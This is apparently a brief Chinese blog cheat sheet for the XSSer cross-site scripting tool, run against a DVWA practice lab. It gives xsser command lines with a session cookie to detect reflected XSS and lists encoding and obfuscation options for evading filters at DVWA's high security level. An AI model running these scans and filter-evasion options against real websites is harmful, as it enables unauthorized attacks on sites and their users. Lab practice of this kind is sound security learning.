xsser

作者: FateKey | 来源:发表于2018-02-07 11:54 被阅读2次

    常用命令

    xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --reverse-check
    验证是否存在xss
    xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=d23e469411707ff8210717e67c521a81" -s -v --heuristic

    绕过命令

    --Str Use method String.FromCharCode()
    --Une Use Unescape() function
    --Mix Mix String.FromCharCode() and Unescape()
    --Dec Use Decimal encoding
    --Hex Use Hexadecimal encoding
    --Hes Use Hexadecimal encoding, with semicolons
    --Dwo Encode vectors IP addresses in DWORD
    --Doo Encode vectors IP addresses in Octal
    --Cem=CEM Try -manually- different Character Encoding Mutations
    (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
    xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" -- cookie="security=high; PHPSESSID=d23e469411707ff8210717e67c521a81" -- Cem='Mix,Une,Str,Hex'

    注入命令

    其他命令

    --gtk 开启图形化界面

    相关文章

      网友评论

        本文标题:xsser

        本文链接:https://www.haomeiwen.com/subject/jusgzxtx.html